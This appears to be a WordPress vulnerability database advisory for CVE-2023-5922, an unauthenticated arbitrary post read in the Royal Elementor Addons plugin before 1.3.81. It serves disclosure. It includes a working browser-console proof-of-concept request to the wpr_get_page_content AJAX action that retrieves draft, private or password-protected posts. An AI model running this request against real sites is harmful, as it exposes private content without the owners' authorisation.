Royal Elementor Addons and Templates < 1.3.81 – Unauthenticated Arbitrary Post Read | CVE 2023-5922 | Plugin Vulnerabilities

Description

The plugin does not ensure that users accessing posts via an AJAX action (and REST endpoint, currently disabled in the plugin) have the right to do so, allowing unauthenticated users to access arbitrary draft, private and password protected posts/pages content

Proof of Concept

WooCommerce needs to be installed and activated. Then, run the below command in the developer console of the web browser while being on the blog as unauthenticated user (4 being the ID of a Draft, Private or Password protected post)

(await fetch("/wp-admin/admin-ajax.php?action=wpr_get_page_content", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
   },
  "body": "wpr_compare_page_id=4",
  "method": "POST",
})).text();

Affects Plugins

royal-elementor-addons

Fixed in 1.3.81

References

CVE

Classification

Type

IDOR

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając (CERT PL)

Submitter

Krzysztof Zając (CERT PL)

Submitter website

https://cert.pl

Submitter twitter

Verified

Yes

WPVDB ID

debd8498-5770-4270-9ee1-1503e675ef34

Timeline

Publicly Published

2023-12-06 (about 2 years ago)

Added

2023-12-06 (about 2 years ago)

Last Updated

2023-12-06 (about 2 years ago)

Other

Published

Title

Published

2025-06-23

Title

MDJM Event Management <= 1.7.6.3 - Subscriber+ Privilege Escalation

Published

2025-09-22

Title

Academy LMS < 3.3.5 - Authenticated (Academy Instructor+) Insecure Direct Object Reference

Published

2021-03-31

Title

Realteo < 1.2.4 - Arbitrary Property Deletion via IDOR

Published

2025-01-10

Title

RRAddons for Elementor <= 1.1.0 - Authenticated (Contributor+) Post Disclosure

Published

2025-05-12

Title

Subaccounts for WooCommerce < 1.6.7 - Authenticated (Subscriber+) Privilege Escalation via Account Takeover